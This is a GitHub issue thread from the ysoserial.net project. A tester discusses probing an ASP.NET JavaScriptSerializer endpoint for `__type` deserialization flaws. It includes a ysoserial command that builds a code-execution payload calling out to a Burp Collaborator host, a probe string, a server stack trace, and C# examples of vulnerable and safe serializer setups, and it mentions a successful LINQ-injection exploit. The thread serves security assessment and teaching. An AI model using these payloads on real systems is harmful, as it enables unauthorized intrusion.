pwntester / ysoserial.net

Deserialization payload generator for a variety of .NET formatters

Question on assessment - Value cannot be null.Parameter name: type

Himself132 opened this issue · comments

Hello,

I definitely have a situation where an app I am assessing is allowing a `__type` declaration, but no matter what I attempt with payloads I get the same response if I include any value for `__type`. Not looking for help exploiting this for my assessment, just some direction. All of the research I've done is showing this should be exploitable. Kind of want to know what the next step could be in discovering whether or not this is exploitable, but I hit a wall on the `__type` null problem. MVC 3.

I have used Freddy, which is certain there is a problem here.

`ysoserial.exe -c "nslookup SCRUBBED.burpcollaborator.net" -g ObjectDataProvider -f JavaScriptSerializer`

And I'm sending this payload to the target and can't get anything to run; it's a Windows box.

The payload that does the detection looks like this (or similar). I can insert null and then I get an error message saying it wants a true or false for another parameter, which I've also tried appending, but I still get the error about type not being null.

`{"__type":""}`

Error looks like this:

```text
HTTP/1.1 500 Internal Server Error
Date: Mon, 20 Apr 2020 15:49:42 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9702
Connection: close
Cache-Control: private
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, PUT, POST, DELETE, HEAD
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

<title>Value cannot be null.
Parameter name: type</title>

Server Error in '/SCRUBBED' Application.

Value cannot be null.
Parameter name: type

Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.ArgumentNullException: Value cannot be null.
Parameter name: type

Source Error:

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.

Stack Trace:

[ArgumentNullException: Value cannot be null.
Parameter name: type]
   System.Activator.CreateInstance(Type type, Boolean nonPublic) +14216720
   System.Activator.CreateInstance(Type type) +12
   System.Web.Script.Serialization.ObjectConverter.ConvertDictionaryToObject(IDictionary`2 dictionary, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object& convertedObject) +447
   System.Web.Script.Serialization.ObjectConverter.ConvertObjectToTypeInternal(Object o, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object& convertedObject) +94
   System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth) +222
   System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeDictionary(Int32 depth) +599
   System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth) +147
   System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeDictionary(Int32 depth) +599
   System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth) +147
   System.Web.Script.Serialization.JavaScriptObjectDeserializer.BasicDeserialize(String input, Int32 depthLimit, JavaScriptSerializer serializer) +110
   System.Web.Script.Serialization.JavaScriptSerializer.Deserialize(JavaScriptSerializer serializer, String input, Type type, Int32 depthLimit) +46
   Spl.Sped.Web.Extensions.CustomJsonValueProviderFactory.GetDeserializedObject(ControllerContext controllerContext) +278
   Spl.Sped.Web.Extensions.CustomJsonValueProviderFactory.GetValueProvider(ControllerContext controllerContext) +23
   System.Web.Mvc.<>c__DisplayClassc.<GetValueProvider>b__7(ValueProviderFactory factory) +48
   System.Linq.WhereSelectEnumerableIterator`2.MoveNext() +238
   System.Linq.WhereSelectEnumerableIterator`2.MoveNext() +281
   System.Collections.Generic.List`1..ctor(IEnumerable`1 collection) +504
   System.Linq.Enumerable.ToList(IEnumerable`1 source) +69
   System.Web.Mvc.ValueProviderFactoryCollection.GetValueProvider(ControllerContext controllerContext) +421
   System.Web.Mvc.ControllerBase.get_ValueProvider() +39
   System.Web.Mvc.ControllerActionInvoker.GetParameterValue(ControllerContext controllerContext, ParameterDescriptor parameterDescriptor) +77
   System.Web.Mvc.ControllerActionInvoker.GetParameterValues(ControllerContext controllerContext, ActionDescriptor actionDescriptor) +137
   System.Web.Mvc.ControllerActionInvoker.InvokeAction(ControllerContext controllerContext, String actionName) +658
   System.Web.Mvc.Controller.ExecuteCore() +143
   System.Web.Mvc.ControllerBase.Execute(RequestContext requestContext) +91
   System.Web.Mvc.<>c__DisplayClassb.<BeginProcessRequest>b__5() +57
   System.Web.Mvc.Async.<>c__DisplayClass1.<MakeVoidDelegate>b__0() +25
   System.Web.Mvc.<>c__DisplayClasse.<EndProcessRequest>b__d() +36
   System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +648
   System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step) +213
   System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously) +131


Version Information: Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3535.0
```

You need to be able to control the object type in this case. Please have a look at https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf

Hello, thanks for the response. I think that is the problem: how can I determine whether or not that is the case without access to the source code? I have used payloads and tried all sorts of intelligent fuzzing to try and determine that. Are there any additional detection methods I can use to see if I can control the object type? I have reviewed that document previously and any other documentation I can find related to the JavaScriptSerializer, as shown above.

Reading the stacktrace it seems you are dealing with a JavaScriptSerializer here. Not much you can do other than trying some payloads to see whether you can get a DNS request back for example. It is probably not vulnerable as you have tried it all.

Here are my notes on this one based on reading the articles:

This should not be vulnerable by default. However, it can become vulnerable when a resolver is used that can allow dangerous types. An example of this resolver is SimpleTypeResolver that can be seen in: https://referencesource.microsoft.com/#System.Web.Extensions/Script/Serialization/SimpleTypeResolver.cs,7b048d54a7d79e87

The following code therefore will be vulnerable:

```csharp
// SimpleTypeResolver lets the JSON "__type" field name any loadable type
JavaScriptSerializer jss = new JavaScriptSerializer(new SimpleTypeResolver());
var json_req = jss.Deserialize<int>(payload);
```

The following code will not be vulnerable:

```csharp
// no type resolver: "__type" is not used to pick a type to instantiate
JavaScriptSerializer jss = new JavaScriptSerializer();
var json_req = jss.Deserialize<int>(payload);
```

This feature can make JavaScriptSerializer without a resolver an ideal choice as a secure serialiser.
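As an added illustration of the point above (this is example code, not part of ysoserial.net or the thread), the middle ground between "no resolver" and `SimpleTypeResolver` is a custom `JavaScriptTypeResolver` that only honours `__type` ids on an allowlist. `SearchRequest`, `AllowListTypeResolver` and `Demo` are hypothetical names; the code assumes .NET Framework's `System.Web.Extensions` assembly.

```csharp
using System;
using System.Collections.Generic;
using System.Web.Script.Serialization;

// Hypothetical DTO the endpoint actually expects (an assumption for this example).
public class SearchRequest { public string Query { get; set; } }

// Allowlist resolver: "__type" may only name types registered here. Returning null
// for any other id makes JavaScriptSerializer reject the payload instead of
// instantiating whatever type the client named, which is what SimpleTypeResolver does.
public sealed class AllowListTypeResolver : JavaScriptTypeResolver
{
    private readonly Dictionary<string, Type> _byId = new Dictionary<string, Type>(StringComparer.Ordinal);
    private readonly Dictionary<Type, string> _byType = new Dictionary<Type, string>();

    public AllowListTypeResolver(params Type[] allowed)
    {
        foreach (Type t in allowed) { _byId[t.FullName] = t; _byType[t] = t.FullName; }
    }

    public override Type ResolveType(string id)
    {
        Type t;
        return id != null && _byId.TryGetValue(id, out t) ? t : null;
    }

    public override string ResolveTypeId(Type type)
    {
        string id;
        return _byType.TryGetValue(type, out id) ? id : null;
    }
}

public static class Demo
{
    public static void Main()
    {
        var jss = new JavaScriptSerializer(new AllowListTypeResolver(typeof(SearchRequest)));

        // Allowed: "__type" names a registered type, so the DTO is materialised.
        string ok = "{\"__type\":\"" + typeof(SearchRequest).FullName + "\",\"Query\":\"x\"}";
        var req = (SearchRequest)jss.DeserializeObject(ok);
        Console.WriteLine(req.Query);

        // Rejected: an unregistered id resolves to null and the serializer throws.
        try { jss.DeserializeObject("{\"__type\":\"System.Version\"}"); }
        catch (InvalidOperationException) { Console.WriteLine("rejected"); }
    }
}
```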

@Himself132 what is the payload you are using? By the stacktrace it seems you are sending a null `__type`.

@pwntester - hey, just wanted to give an update: I actually got remote code execution. They are using LINQ, which is dynamic. The following payload worked; interestingly enough, it still just shows a generic error message and gives no indication of exploitation other than the out-of-band DNS call.

So I guess the question is, would there have been a detection payload that would've worked here? In case there is a dictionary for deserialization issues I could add a payload to? Or are we stuck with the out-of-band detection, which can be problematic from a false positive perspective?

The original payload was FREDDY just sending

`{"__type":""}`

The exploit for RCE was

[screenshot: 2020-05-07_10-27-03]

as referenced in this link

https://insinuator.net/2016/10/linq-injection-from-attacking-filters-to-code-execution/

Thank you for showing the PoC and how it works. This is very interesting but it is not related to serialization as far as I can see.

We will need another extension to find this kind of issue; perhaps it should be added to the Burp Suite scanner engine itself.